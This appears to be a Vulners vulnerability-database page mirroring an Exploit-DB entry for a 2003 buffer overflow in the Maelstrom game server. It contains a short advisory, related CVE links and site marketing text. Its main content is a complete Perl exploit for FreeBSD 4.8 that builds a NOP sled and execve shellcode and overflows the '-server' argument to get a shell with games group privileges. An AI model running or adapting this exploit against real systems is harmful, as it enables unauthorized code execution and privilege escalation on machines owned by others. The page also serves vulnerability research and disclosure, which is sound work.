Lucene search
+L

Maelstrom Server 3.0.x - Argument Buffer Overflow (1)

🗓️ 20 May 2003 00:00:00Reported by Luca ErcoliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

Maelstrom Server 3.0.x has a buffer overflow vulnerability allowing local code execution.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-0325
22 May 200304:00
cve
cvelist
Cvelist
CVE-2003-0325
22 May 200304:00
cvelist
debiancve
Debian CVE
CVE-2003-0325
22 May 200304:00
debiancve
exploitdb
Exploit DB
Maelstrom Server 3.0.x - Argument Buffer Overflow (2)
23 May 200300:00
exploitdb
exploitdb
Exploit DB
Maelstrom Server 3.0.x - Argument Buffer Overflow (3)
20 May 200300:00
exploitdb
euvd
EUVD
EUVD-2003-0320
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-0325
9 Jun 200304:00
nvd
source: https://www.securityfocus.com/bid/7630/info

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.

#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug
found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE.
# maelstrom-3.0.5     Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists ==
flooded mbox #¤%
$len = 1000;
$ret = pack("l",0xbfbffb7f);
$nop = "\x90";
$offset = 0;
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

for ($i = 0; $i < $len - length($shellcode); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;
exec("/usr/X11R6/bin/Maelstrom  -server $cakeman");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.01053
27